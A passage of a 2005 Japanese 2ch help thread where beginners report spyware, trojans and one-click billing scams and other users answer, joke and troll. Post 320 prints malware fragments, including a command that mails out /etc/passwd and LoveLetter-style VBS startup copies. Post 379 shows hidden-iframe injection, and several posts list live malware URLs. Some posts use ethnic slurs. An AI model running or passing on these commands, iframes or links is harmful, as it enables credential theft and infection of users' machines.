261 :ひよこ名無しさん:05/02/18 00:38:40 ID:???
>>260
それなんなの?

262 :ひよこ名無しさん:05/02/18 00:43:13 ID:???
>>260
ここは助けてくださいスレだぼけ。相談者が来ない出張所にすっこんでろ!

263 :ぼるじょあ ◆yBEncckFOU :05/02/18 00:53:00 ID:???
>>261
(・3・) エェー 転ばぬ先の杖w

264 :ひよこ名無しさん:05/02/18 00:54:28 ID:???
会員募集中と書いてあったよ。

265 :ぼるじょあ ◆yBEncckFOU :05/02/18 01:00:05 ID:???
(・3・) エェー ボクは会員じゃありませんけどNE
陰ながら応援してますYO

266 :ひよこ名無しさん:05/02/18 01:01:29 ID:???
工エエェェ(´д`)ェェエエ工

267 :ひよこ名無しさん:05/02/18 01:23:17 ID:J2556p60
エロサイトでいろんなリンクに飛びまくってたら、あるサイトをクリックしたところで
いきなりウイルスが検出されましたと、なんだかんだで5、6回
ノートンが防いで、2つトロイに感染してしまいましたがすぐ削除しました。
その他にアラートで「You must download it!!」とか出てきたのですが、
Alt+F4で解除出来なかったためCtrl+Alt+Deleteでタスクから強制終了
させました。今はなんともないのですが大丈夫でしょうか?

268 :ひよこ名無しさん:05/02/18 01:27:08 ID:???
深夜にすいません。DLしたファイルの中にかなり怪しいフォルダに偽装されたexeファイルがあって
間違って実行しちゃったんですが、その後、マイドキュメント内に自分のデスクトップ画像がいつの間にかbmp形式で
作成されていたのですが、これって苺キンタマというやつなんでしょうか?

269 :PC初心者板”管理”運営責任者 ◆C3hGF5scDA :05/02/18 01:28:49 ID:???
>>268
んだな。

270 :ひよこ名無しさん:05/02/18 03:08:01 ID:LCx5G1Es
Warning! your computer is at risk
という題名の警告文が画面右下に表示されます
これはスパイウェアに感染したということなんでしょうか?


271 :ひよこ名無しさん:05/02/18 06:01:53 ID:???
>>267
NG
>>270
そうだよ

272 :グリコ(・∀・) ◆4kNJblDpUo :05/02/18 11:19:07 ID:8OTM30lN
インターネットしてたら、一定時間たつと、勝手にインターネットエキスプローラが起動して、エロサイトに接続されます!どうしたらいいですか!?教えてください!お願いします!

273 :ひよこ名無しさん:05/02/18 11:20:28 ID:???
>>272
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。

274 :ひよこ名無しさん:05/02/18 11:22:43 ID:???
>>272
━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。

275 :ひよこ名無しさん:05/02/18 13:53:29 ID:v7A+V1Ul
>>260
それをやると、安全な見たいサイトまで、
真っ白になる場合がしょっちゅうあるから、ふべん極まりないから。

276 :ひよこ名無しさん:05/02/18 14:06:20 ID:???
いいと思ってるならやらせとけ。間違いではないし。

277 :ひよこ名無しさん:05/02/18 14:07:50 ID:???
それよか、タブブラウザでJavaScriptとActiveXのON/OFFを切り替えるだけでおk。

278 :ひよこ名無しさん:05/02/18 14:09:08 ID:???
【総合】スパイウェア予防駆除 Part6
http://pc5.2ch.net/test/read.cgi/sec/1108613740/

279 :ひよこ名無しさん:05/02/18 14:15:06 ID:???
IE使ってるヤシは北チョン

280 :ひよこ名無しさん:05/02/18 15:58:25 ID:???
ie立ち上げるとグーグル画面にGEORGE BUSH IS IDIOTって入力画面が出てくる
スパイウェア踏んだ人いる?

281 :ひよこ名無しさん:05/02/18 17:04:28 ID:YkrWh8Ni
今のエロサイトは強烈だねーいろいろライセンス買ったのでエロサイトで試しているんだけど
IE使ってないのにブックマーク仕込みやがんの、くっそ0−



282 :ひよこ名無しさん:05/02/18 17:05:37 ID:YkrWh8Ni
あっ、ちなみに海外のエロサイトだよ日本のやつはたいしたことはない


283 :ひよこ名無しさん:05/02/18 17:08:24 ID:???
>>282
踏んでもなんともないと思うからそのエロサイト貼ってみてよ

284 :ひよこ名無しさん:05/02/18 17:10:22 ID:???
>>283
あんたのパソコンどうなっても知らないよ

285 :ひよこ名無しさん:05/02/18 17:12:14 ID:???
>>283
yahoo.comでmature fuckで検索してみいろいろあるから


286 :ひよこ名無しさん:05/02/18 17:14:49 ID:???
すいません、エロサイト見てたら股間がおかしくなりました。
どうすれば直りますか?

287 :ひよこ名無しさん:05/02/18 17:15:25 ID:???
そんでもってactive-x、javascript はオンにしてやらないと駄目よつまらんから


288 :ひよこ名無しさん:05/02/18 17:15:57 ID:???
>>286
樹海に逝ってこい

289 :ひよこ名無しさん:05/02/18 17:36:00 ID:???
>>287
( ´,_ゝ`)プッだから引っ掛かるんだよデブ

290 :ひよこ名無しさん:05/02/18 18:15:05 ID:???
>>289
おまえ馬鹿だなぁ

291 :ひよこ名無しさん:05/02/18 21:55:16 ID:1gURgA1g
困ったことが起こりました!
電源を入れても、何も表示されません!
BIOS(メーカーの)画面すら表示されません!
電源プラグはちゃんと差さっています。
電源ランプは点きます。
ひょっとして、BIOSというところが破壊されたのではないでしょうか?

292 :158:05/02/18 22:41:50 ID:XuDLdax8
一昨日質問した者です。ブラウザ、にちゃん専用ブラウザでも閲覧できない状態になりました。今は携帯からです。たぬさん、助言頂いたのにすいません。そして、ありがとうございました。

293 :ひよこ名無しさん:05/02/18 22:45:49 ID:???
>>291
モニタの電源が入っていない

294 :ひよこ名無しさん:05/02/18 22:45:59 ID:s2csVFRQ
最近ここからメールがくるんですけど配信解除するためのクリック大丈夫でしょうか?
※当メールはJ-membersパートナーサイト会員の皆様に配信しています※
   
     ───────────男を磨くブロードバンド「J-members」
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  ▼ J-members Mail Magazine #008 ▼
          http://www.j-members.net/
━…・…━…・…━━━…・…━…・…━━━…・…━…・…━━━…

295 :ひよこ名無しさん:05/02/18 22:47:49 ID:???
>>291
替えのパーツがあるなら1つずつ換えてみるのがいいんだが
そうでもなきゃ修理に出すか諦めて新しいの買う。

>>292
よく知らんが、たぬは無知だから適当ばっかり言ってるハゲだよ。

296 :ひよこ名無しさん:05/02/18 22:51:36 ID:???
>>292
まさか>>225をやったのか?

297 :たぬたんなりよ(=^u^=):05/02/19 00:15:03 ID:???
>>292
(=^u^=) そうなりか、残念なり・・・

      67;15;70;15はかなり強力みたいなりね

298 :158:05/02/19 00:53:15 ID:qrlS8NXf
いえ、225はやってません。何もする前に気付いたらそういう状態になってしまったので(専用ブラウザも繋がらなく)。リカバリをして、セキュリティソフトをちゃんと導入するようにします。

299 :ひよこ名無しさん:05/02/19 00:56:45 ID:???
要するに初心者はもがいただけ時間の無駄なので直そうとなんか思わないでくださいね。

300 :ひよこ名無しさん:05/02/19 01:08:08 ID:???
どこで貰ったんたんだろうね?

301 :ひよこ名無しさん:05/02/19 01:15:50 ID:???
買ったばかりのパソコンをWindowsUpdateせずに40分ネットに繋げていれば
なんらかのウイルスに感染するという統計がある。ファイアーウォール無しで
WindowsUpdate中に感染した例もあるぐらいだからどこかに行って貰うのは非常に簡単。

302 :ひよこ名無しさん:05/02/19 01:18:44 ID:???
67.15.70.15/~blankは悪魔の番号だな

303 :ひよこ名無しさん:05/02/19 01:24:59 ID:???
合わせ技一本だろ

304 :ひよこ名無しさん:05/02/19 04:24:22 ID:???
>>294
配信解除なんてされないのがふつう。
むしろ、そのメールアドレスが、現在使われているアドレス、
読む人がいるアドレスだと、ばれてしまう。

305 :ひよこ名無しさん:05/02/19 12:00:23 ID:???
たまに忍者が出てくるのだが、あれは何かを仕込んでくるのだろうか。

306 :ひよこ名無しさん:05/02/19 12:57:28 ID:???
んなこたーない

307 :ひよこ名無しさん:05/02/19 13:36:11 ID:???
みんないい加減にして!

308 :ひよこ名無しさん:05/02/19 14:35:11 ID:???
>>306
層でしたか。教えてくださって有り難うございます。
しかしあれはいったいなんでしょうか?突然黒い画面のHPに移動して真ん中辺りに忍者が居るのですが。

309 :ひよこ名無しさん:05/02/19 14:44:39 ID:???
>>158のアドレスを踏んでみました。
真っ白なサイトが表示されるので、ソースを見ると
ttp://install.xxxtoolbar.com/ist/scripts/prompt.php
に飛ばされる仕組み
上に飛ばされると、「悪意のあるURL%1s(%2s)がSpyBot-S&D IEヘルパーで検知されました。」
そしてURLの頭に゛view-source:"を付けてそのページのソースを見てみると、
とても悪質な仕掛けがしてあることがわかる。

>249-251のように対策を取ってから踏まないと絶対ヤヴァイ

310 :ひよこ名無しさん:05/02/19 14:44:59 ID:???
忍者ttp://www.shinobi.jp/index.htmlの煙巻きコントロールという技だな。
見せたくないホストを弾くことができる。

311 :ひよこ名無しさん:05/02/19 15:01:47 ID:qrddNWdF
サーファーやアマテラスで検索できるアダルトサイトは危険度が低いが、
同人誌サイトはやたら危険な感じがする。油断していると外国の何かがインストールされてまともにインターネットが出来なくなる。

312 :ひよこ名無しさん:05/02/19 15:21:29 ID:???
>>311
>>249-251見て対策を取る

313 :ひよこ名無しさん:05/02/19 16:44:41 ID:ZyfUwLti
freeXXXは何を使えば駆除できますか?

314 :ひよこ名無しさん:05/02/19 16:59:01 ID:???
↓ここはどんなとこ
www.ura-data.jp/mbchk.php

行っても大丈夫ですか?

315 :ひよこ名無しさん:05/02/19 17:00:37 ID:???
>>311
同人サイトは無料をえさにアダルトサイトへ誘い込もうとするから、初心者にはお勧めできない。
ウイルスも多いから見るならば自分専用のパソコンを持ってから。

316 :ひよこ名無しさん:05/02/19 17:01:59 ID:???
>>313
CWShredderを使って様子を見てみろ。
ただし、使い方は下のページの[注5]を参考にしてみろ。
http://5sec.biz/acc54/counter.htm

317 :ひよこ名無しさん:05/02/19 17:04:46 ID:???
I am an average salaried worker.
Work related to the computer is done.

こういうのが頻繁に出るのですが何ですか?

318 :ひよこ名無しさん:05/02/19 17:05:47 ID:???
The killer hates working.
The main daily work is writing of 2ch.
Additionally, it is melancholic because of rain today.
あと、こういうのも。↑

319 :ひよこ名無しさん:05/02/19 17:06:07 ID:???
>>317
ほたっとけ!

320 :ひよこ名無しさん:05/02/19 17:08:51 ID:???
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

321 :ひよこ名無しさん:05/02/19 17:47:15 ID:???
>>309
すごい!!鑑定乙です。

322 :ひよこ名無しさん:05/02/19 17:50:51 ID:???
>>316
工エエェェ(´д`)ェェエエ工

323 :ひよこ名無しさん:05/02/19 17:57:16 ID:???
>>309
全然
そのセキュリティホールが残っていない人に取っては、痛くも痒くもない
そもそも、ウイルス対策ソフトがストップしてくれる

324 :ひよこ名無しさん:05/02/19 18:06:45 ID:???
年齢認証 18歳以上で利用規約に同意した方のみ以下にお進みください。
と書かれていたのですが、利用規約を見ずに画像をクリックしたら
入会手続きを完了してしまいました。
入会から4日間以内に利用料金をお振込くださいとあります。
>>6に近いですが利用規約をよく見たら
●お客様の利便性を優先した入会・後払いシステムを採用しています。「トップページの18歳以上で利用規約に同意した方のみ以下にお進みください。」以下に進み、各項目いずれか1個をクリック(押す)した時点で自動的に入会となります。
と書かれてました。振込まないといけないでしょうか?orz

325 :ひよこ名無しさん:05/02/19 18:13:24 ID:qFN03YKg
>>242
自分もまったく同じ現象です。
CWShredderではどうしようもありません。
誰か助けてください!!

326 :ひよこ名無しさん:05/02/19 18:14:31 ID:???
>>323
ウイルス対策ソフトをすり抜けるらしいですよ

327 :ひよこ名無しさん:05/02/19 18:18:33 ID:???
http://67.15.70.15/~black/fuckporn.html
こんなActiveXコントロールを自らインストールするバカがいるか?
そんなバカは針でイイ

328 :ひよこ名無しさん:05/02/19 18:22:25 ID:???
>>326
一部は防いでくれるので即死はしない。

329 :ひよこ名無しさん:05/02/19 18:27:48 ID:???
http://67.15.70.15/~black/fuckporn.html

貰ったら最後の様だなw
http://www.google.co.jp/search?hl=ja&q=%2267.15.70.15%22&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

330 :ひよこ名無しさん:05/02/19 18:33:13 ID:???
http://www.slotchbar.com/ist/flash/sp2tutorial_v1.swf
これが表示されるんだよな

331 :324:05/02/19 18:40:43 ID:TlsFm/T7
誰かお願いします。

332 :ひよこ名無しさん:05/02/19 18:41:17 ID:???
とんちんかんなアフォしかいない

333 :ひよこ名無しさん:05/02/19 18:42:46 ID:???
>>331
>>6n に書いてあるけど。

334 :324:05/02/19 18:48:05 ID:TlsFm/T7
アフォでしたorzありがとうございました。

335 :ひよこ名無しさん:05/02/19 18:53:39 ID:???
もし、メールや電話で、このような料金請求を受けた場合は、

1 利用規約がないような場合は無視をする。

2 利用規約がある場合は、よく読んで確認する。

3 電子消費者契約法では、事業者は、消費者に対して申し込み内容を再度確認させるための画面を用意する必要があるので、
このような確認措置が無いような場合、その申し込みは無効を主張することができる。

4 上記2,3に「同意」した上サービスを利用した場合は、支払い義務が発生するおそれがある。
なお、上にある携帯電話のイメージ画面のように「いいえ」や「NO」ボタンをクリックしても、
「登録完了」画面になる場合もあるが、そのような画面では、確認措置があることにならないので、「3」に準じて対処する。

5 悪質なものに対しては、氏名、住所、電話番号などの個人情報は絶対に伝えない。


以上5点の鉄則を必ず守りましょう。

336 :ひよこ名無しさん:05/02/19 19:01:13 ID:???
istactivex.inf
これの実態がこれ
[Version]
Signature="$CHICAGO$"
AdvancedINF=2.0

[Add.Code]
ISTactivex.dll=ISTactivex.dll

[ISTactivex.dll]
file-win32-x86=thiscab
clsid={7C559105-9ECF-42b8-B3F7-832E75EDD959}
FileVersion=1,0,0,2
RegisterServer=yes


337 :ひよこ名無しさん:05/02/19 19:20:50 ID:???
C:\WINDOWS\ursat.exe
"C:\Program Files\Internet Optimizer\optimize.exe"
C:\Program Files\ISTsvc\istsvc.exe
"C:\Program Files\Web_Rebates\WebRebates0.exe"
インストールされるのはこんなものだけど、
アンインストールしてもレジストリにゴミをいっぱい残すなや

338 :ひよこ名無しさん:05/02/19 19:51:18 ID:qrkDkFkl



名前:
E-mail:
内容:
勇気がなくてスレに乗っているエロ動画を何個かみたのですが有料ですか?
無害と書いてありましたが・・・




339 :ひよこ名無しさん:05/02/19 19:54:31 ID:C0XFWzuq
すいません、対処法を教えてください。

OSはXPで、ブラウザはIE6.0、セキュリティーソフトはマカフィーのVirus scanを使っています。
症状としては右下のツールバーに検索窓のようなものができ、さらにデスクトップにアイコンが5つほど追加され、
そしてIEのウィンドウが何度消しても勝手に開き、広告やアダルト系のサイトに繋がります。
Ad-Aware、Spybot、Hijack This、Virus scanを使用すると、スパイウェアやトロイの木馬などが検出され、
W32/Bube.genというウイルス以外は削除に成功するのですが、再起動や一定時間たつと元通りになってしまいます。


340 :ひよこ名無しさん:05/02/19 20:25:27 ID:???
>>158は、
copy "C:\WINDOWS\Downloaded Program Files" D:\aaa
こんな風にダウンロードされたActiveXコントロールのキャッシュフォルダの中身を
他のフォルダにコピーすると実態が見られるようになるから、
それを基に分析してアンインストールする。
最初に、システムにインストールされてしまった.dllファイルのアンインストール
regsvr32 /u "C:\WINDOWS\Downloaded Program Files\ISTactivex.dll"
これでレジストリ内からも削除される
あとはインストールされたものをそれぞれ削除すればいい。

341 :ひよこ名無しさん:05/02/19 20:51:55 ID:???
くだらねえネタいつまでも引っ張ってんな。

342 :ひよこ名無しさん:05/02/19 20:54:09 ID:???
http://www.dmr2.nm.ru/DEATH26/DEATH.EXE
実行しようかどうか迷い中

343 :ひよこ名無しさん:05/02/19 21:03:37 ID:???
>>342
なにそれ?

344 :ひよこ名無しさん:05/02/19 21:50:36 ID:???
>342
BackDoor-FP.cli
トロイだってよ

345 :ひよこ名無しさん:05/02/19 21:58:02 ID:???
>>341
くだらねえタネいつまでも蒔いてんな。

346 :ひよこ名無しさん:05/02/19 23:03:34 ID:???
困っている者よ
>14
>15
>16
>17
>18
実行しなさい

347 :ひよこ名無しさん:05/02/19 23:23:53 ID:???
工エエェェ(´д`)ェェエエ工

348 :違反でしょ?:05/02/19 23:56:54 ID:???
http://blog.naver.co.jp/onigiriitadakimasu.do

これって著作権違反だよな?
注意しても聞く耳持たず・・・

349 :ひよこ名無しさん:05/02/19 23:59:20 ID:???
     _____
   /。    \
  /        \
 / ┏━━━━━┓   
 |  ┃ ● |● |
 |  ┃ | \__/| |  
 \┃ \■__ / |     え?
   \        /

350 :ひよこ名無しさん:05/02/20 00:02:39 ID:???
>>348
カスラックとかに通報しろよ

351 :ひよこ名無しさん:05/02/20 00:06:48 ID:???
>>348
音楽著作権協会に教えてやると相当な罰金になると思われる

352 :ひよこ名無しさん:05/02/20 03:13:51 ID:???
パクリ、略奪をホントに社是に掲げているチョン企業だぞ。
逆に、謝罪と賠償を要求されかねない気もする。

システムを悪用した詐欺にユーザが引っかかっていてもチョパーリだから
相手にもしていない模様。
韓国情報部の出先機関だという電波もいるが、あんまりその会社自体まともな
所じゃないので流石のJASRACやACCSでもどうなるか・・・
jpドメインでも鯖はkrだと言って言い逃れしそうだしな。

353 :名無しさん:05/02/20 03:30:41 ID:0dDgAXd2
別スレから誘導されてきました。
本当に困ってるので助けてほしいのです。1〜8は読んだのですけど
PCのことは詳しくないので何がなんだかわかりません、、、

同じ事になりますけど
今日2CHから色んなサイトをぐぐっていたら、いきなり外国のアダルトサイトが開いて
デスクトップに外人女性顔のアイコンのFree XXXというのがでてきました、
消去しても立ち上げると、それがまた元に戻って出ていて、何回やってもダメでした。

どうにかしてけすことはできないのでしょうか?教えて下さいm(.=.)m






354 :ひよこ名無しさん:05/02/20 03:36:38 ID:???
SpybotとAd-Aware位いはやったのか?

355 :ひよこ名無しさん:05/02/20 03:37:17 ID:???
>何がなんだかわかりません
コチラとしても何がなんだかわかりませんとしか言いようがないっす

356 :ひよこ名無しさん:05/02/20 03:40:28 ID:???
数少ない回答のチャンスを逃したね

357 :ひよこ名無しさん:05/02/20 03:41:08 ID:???
>>353
定番3つは試したのか?

358 :ひよこ名無しさん:05/02/20 03:44:17 ID:???
セキュリティスレの中の人は皆同じかと

359 :名無しさん:05/02/20 03:53:30 ID:0dDgAXd2
すみません、定番の3つってどれですか?

360 :353:05/02/20 03:54:54 ID:0dDgAXd2
名前の部分かえわすれてました


361 :ひよこ名無しさん:05/02/20 03:59:36 ID:???
6)  ブラウザジャッカーCoolWebSearch駆除ツール
ttp://www.higaitaisaku.com/removecws.html

7) 定番スパイウェア除去ソフト、Ad-awareSEとSpybotS&Dを使って除去。

Ad-Aware SEによるスパイウェアの除去方法
ttp://www.higaitaisaku.com/adaware.html
http://lavasoft.element5.com/default.shtml.ja(公式サイト)
ttp://bdc.s15.xrea.com/(日本語化パッチ)

Spybot1.3によるスパイウェアの除去方法
ttp://www.higaitaisaku.com/spybot2.html
http://www.safer-networking.org/(公式サ

362 :353:05/02/20 04:43:39 ID:0dDgAXd2
7を試したら治りましたー
ありがとう!
テンプレにのってることわざわざきいてすみませんでした


363 :ひよこ名無しさん:05/02/20 05:21:36 ID:???
>362
ヲマイ馬鹿だろ。

テンプレの1〜8読んでも判らなかったのに>361で
何で判るんだよw


364 :ひよこ名無しさん:05/02/20 05:37:33 ID:???
やはり32行にまとめないといかんな。

365 :ひよこ名無しさん:05/02/20 06:21:02 ID:???
>>363
少し考えたんだろ。
ここに来る奴は自分は初心者だから、という気持ちが強いから
人に頼ろうということしか考えて来ない。
テンプレ見た瞬間にみんな脳が爆発しそうになって思考が停止するんだよ。

366 :ひよこ名無しさん:05/02/20 10:35:44 ID:hVr1jr3c
別のサイトに移動しようとすると、
変なエロ広告が全面にでてきて、
「別のサイトに移動しようとしています。
よろしいですか?」みたいな
表示がされます。
つまり、一発で移動できない。
どうしたら表示されなくなりますか?
OSはwindowsxp ソフトはインターネットエクスプローラーの6です
ノートンというソフトが入ってます。

367 :ひよこ名無しさん:05/02/20 11:14:54 ID:???
>>366 スパイウェアの可能性が非常に高いです。
こちらのHPの「スパイウェア対策」や「悪質なサイト」などの項目を読んで
対処してみてください。

http://outbreak.kt.fc2.com/index.html

368 :366:05/02/20 11:34:14 ID:zzCGrbAn
レスがついてる…
ありがとうございます!
早速やってみます!

369 :ひよこ名無しさん:05/02/20 14:56:08 ID:zNmFHs/G
他スレでも質問したのですが

教えてください。
海外のエロサイトいったらやばいとこ踏んだらしくスパイウェア駆除できません。
Ad-aweraとSpy-bot両方使いましたがだめでした。
なんかひっかかって削除するけどスキャン中か削除しようとするとヘンな画面が開く。
OpenJaneの画面まで一瞬へんな画面がひらいて小さい英語のウインドが開きます。(このプログラムは不正な処理を
行ったので強制終了されます。って出っ放し。でもジェーン自体は使える)
仕方なくセーフモードで駆除してみたけどネット繋ぐと全く同じ状況に。
ADSLのモデムの電源切るとIEもジェーンも開かない。
クッキーのとこにライトプロテクトされてるdatファイル?があります。

助けてください

370 :ひよこ名無しさん:05/02/20 15:06:04 ID:???
寒いからやだ。

371 :ひよこ名無しさん:05/02/20 15:17:03 ID:???
>>369
index.datは必要なファイルだ

372 :ひよこ名無しさん:05/02/20 15:39:05 ID:???
     _____
   /。    \
  /        \
 / ┏━━━━━┓   
 |  ┃ ● |● |
 |  ┃ | \__/| |  
 \┃ \■__ / |     え?
   \        /

373 :ひよこ名無しさん:05/02/20 17:09:45 ID:???
エロサイト巡回してたらワンクリ引っかかってしまったorg
アホくさ

374 :ひよこ名無しさん:05/02/20 18:05:41 ID:???
http://sexy.hame-hame.net/?OCXA

ここ引っかかった。


375 :ひよこ名無しさん:05/02/20 18:59:37 ID:dbtTkROK
初期化したらウィルスは消えるのでしょうか。もし消えるのなら初期化の仕方を教えてください。
色んな対策サイトを見ながら試しましたがどれもダメでした。疲れました。二度とエロサイトも見たくないです。

376 :ひよこ名無しさん:05/02/20 19:12:47 ID:???
とか言いながら、見たくなるのがエロサイトの魔力・・・

377 :ひよこ名無しさん:05/02/20 19:14:06 ID:???
>>375
PCがまだ使える状態なら リカバリ 再インストール でググるといろいろやりかた書いてるサイトあるよ。
ほんで、そのあとすぐWindowsUpdateね。

378 :ぼるじょあ ◆yBEncckFOU :05/02/20 20:37:28 ID:???
>>376
(・3・) エェー そこで>>260ですYO!

379 :ひよこ名無しさん:05/02/20 20:38:15 ID:???
<iframe src="http://gb.bbs.ws/add-gb.php?book=xtrime&action=new&pg=1" height="1" width="1"></iframe>
<iframe src="http://x.full-tgp.net/?ms.com" height="1" width="1"></iframe>


380 :ひよこ名無しさん:05/02/20 20:41:53 ID:???
ERROR さくらが咲いてますよ。って何?

381 :ひよこ名無しさん:05/02/20 20:49:14 ID:uD97KmvG
すみません!
おそらくウイルスだと思うのですが
パソを起動すると何もしていないのに
1、2分たつとexeファイルがだだしく終了できませんでしたというエラーメッセージがでて
そのまま再起動になってしまいます
なので、起動→エラー→再起動の繰り返しです
どうしたらよいでしょうか?

XP、IEです。
ノートンをいれているんですがすでに期限はきれています。
スキャンはできますがすぐ再起動に入ってしまうのでできません。

382 :ひよこ名無しさん :05/02/20 20:50:51 ID:???
http://urafeti.candyhos.com/nyuukai.html
ここのサイト見たらいきなり入会させられたんだけど
ほっといて大丈夫かな?

383 :ひよこ名無しさん:05/02/20 20:50:57 ID:???
>>381
何もしてないのにそうなるわきゃねーだろ!
お前が何かをしたからそうなったんだろう?
よーく思い出せ。

384 :ひよこ名無しさん:05/02/20 21:02:39 ID:???
http://pc5.2ch.net/test/read.cgi/hack/1098870589/133-
オモシレー奴がいるきゃはっはは

385 :381:05/02/20 21:03:11 ID:uD97KmvG
すみません書き方がいけませんでした
症状がでたのは変なエロサイト踏んでからです
そのときは、あと何秒でシャットダウンしますというカウントダウンがでて
それでシャットダウンがおこり、それから起動再起動のループが始まりました
何もしていないというのはループ中何の動作もしないのに起動再起動が繰り返されるってことです

386 :ひよこ名無しさん:05/02/20 21:04:33 ID:???
>>385
>>365

387 :ひよこ名無しさん:05/02/20 21:17:33 ID:???
>>385
セーフモードで起動して、ここのテンプレ>>12-19

388 :381:05/02/20 21:31:13 ID:uD97KmvG
>>387
ありがとうございます!
セーフモードはどうやって起動するのでしょうか。
すみません

389 :ひよこ名無しさん:05/02/20 21:32:54 ID:???
>>388
ホントおまえをぶん殴りたい

390 :381:05/02/20 21:36:50 ID:uD97KmvG
>>389
すみません、こんな感じになったのははじめてで…
教えていただけないでしょうか

391 :ひよこ名無しさん:05/02/20 21:37:12 ID:???
>>388
やっても無駄。便利屋に修理頼め。

392 :ひよこ名無しさん:05/02/20 21:39:15 ID:???
>テンプレ>>12-19

これにツッコミ入れるべきでしょうか

393 :ひよこ名無しさん:05/02/20 21:42:06 ID:???
荒らしは放置。引っ掛かる奴も自業自得。ということで

394 :381:05/02/20 21:42:10 ID:uD97KmvG
>>391
無駄ですか…。

395 :ひよこ名無しさん:05/02/20 21:50:59 ID:???
>>394
セーフモード(F8を連打)でOSを起動

396 :381:05/02/20 21:58:33 ID:uD97KmvG
>>395
ありがとうございます!
とりあえずがんばってみます!

397 :366:05/02/20 22:01:55 ID:oEgGfT+C
>>367さんのやりかたでspypodを使ってみました。
でも「ファイル上にあるため、削除できません」
のようなメッセージがでて、いくつか残ったままです。
結局、エロ広告は消えません。
なんど試してみてもできないようです。
どうしたらいいか、どなたか教えてください。

398 :381:05/02/20 22:21:08 ID:KqLXfFz+
何とかパソコンが使える状態になったので、こっちからカキコです。

安全モードでシステムの復元をおこなってみたところ、一応
起動→再起動のループがなくなりました。

ノートンを起動させてみたところシステム状態が緊急に注意が必要という表示でした。
現在コンピューターをスキャンしています。

これはこのままノートンとスパイウェアでスキャンするだけで大丈夫でしょうか?

399 :ひよこ名無しさん:05/02/20 22:27:05 ID:???
>>398
新品ノートンのスキャンはかなり効果があるかと

400 :381:05/02/20 22:29:13 ID:KqLXfFz+
>>399
去年の夏ごろから更新してないんですよね。
これを期にセキュリティにもう少し気を配ってみようとおもいます。

ほんとうにありがとうございました。

401 :ひよこ名無しさん:05/02/20 22:30:49 ID:???
あい。

402 :ひよこ名無しさん:05/02/20 22:49:57 ID:???
「Documents and Settings」→「ユーザー名」→「Local Settings」→「Temp」→「se.dll,DllInstall」
っていうファイルって大事なファイルでしょうか?
さっき削除してしまったんですが、なんかいろいろ開くたびに、
これの実行中に、例外が発生しました
って出るんだけどやばいですかね?

ちなみに>>205のやつに感染中です
IE6なのに、パンダスキャン>>3実行しようとしても、ブラウザが対応してないとか言ってできません
先週感染してないときはちゃんと出来たのに・・・

403 :ひよこ名無しさん:05/02/20 22:54:44 ID:???
ID出しやがれです

404 :402:05/02/20 23:17:48 ID:3OwUg0Og
しかもマイコンピューターやごみ箱ダブルクリックしてもse.dll,DllInstallの小画面が出ます

405 :402:05/02/20 23:18:40 ID:3OwUg0Og
それと同時に
Is your computer infect with spyware?
って小画面も出ます

訳してみたら、
あなたのコンピュータはスパイウェアに感染させますか?
なんですね○| ̄|_

406 :ひよこ名無しさん:05/02/20 23:22:13 ID:???
>>402
   ∩___∩      
   | ノ      ヽ/⌒) きゃははははゲラゲラゲラ〜〜〜
  /⌒) (゚)   (゚) | .|  
 / /   ( _●_)  ミ/   ∩―−、
.(  ヽ  |∪|  /    / (゚) 、_ `ヽ
 \    ヽノ /      /  ( ●  (゚) |つ
  /      /      | /(入__ノ   ミ   ざまみろ ザマミロ ざまーみろ
 |       /       、 (_/    ノ  
 |  /\ \       \___ ノ゙ ─ー
 | /    )  )       \       _     
 ∪    (  \        \     \

407 :ひよこ名無しさん:05/02/20 23:23:39 ID:???
日記帳か

408 :ひよこ名無しさん:05/02/20 23:24:33 ID:???
>>402
たぬスレにse.dllうんたらってやつがいたけど
spybotで治ったって書いてたぞ。 セーフモードでやってみ

409 :ひよこ名無しさん:05/02/20 23:41:43 ID:???
Top UnSafe Applications
1.SE.DLL(BROWSERHIJACKER)
2.XHRMY.EXE(ADWARE)
3.NEWPOP63.EXE(ADWARE)
4.WINSERVAD.EXE(ADWARE)
5.SE.DLL(ADWARE)

410 :助けて〜:05/02/20 23:52:35 ID:GtUbaEn6
写真画像スレにあった
http://cos.site.ne.jp/img-box/img20041105015107.jpg
これを踏んでウイルスに感染しちゃいました。
なんか妙なお姉さんの画像のアイコン&XXXの奴です
「新しくインストールされました。」てなってます。
削除しても再起動したら又でてくる
どうしたらいいんでしょう・・。
http://www.ne.jp/asahi/atumare-egao/a-mama/WORM_BADTRANS.B.htm
↑の通りにやってみたんですがうまくいかないですし
システムの復元もできません。
一体どうすればいいのでしょう

411 :ひよこ名無しさん:05/02/20 23:55:08 ID:???
>>410
>>2-4

412 :ひよこ名無しさん :05/02/21 00:47:54 ID:PstD53cm
ウイルスバスターはスパイウエアにも効果ありますか?

413 :ひよこ名無しさん:05/02/21 00:54:34 ID:SaMN67Tj
すいません。助けて下さい。
さっき、他スレに貼られていたアドレスをうかつにもクリックしてしまいました。
6の点プレにもあるように、個人情報が張り出され、勝手に登録しました。
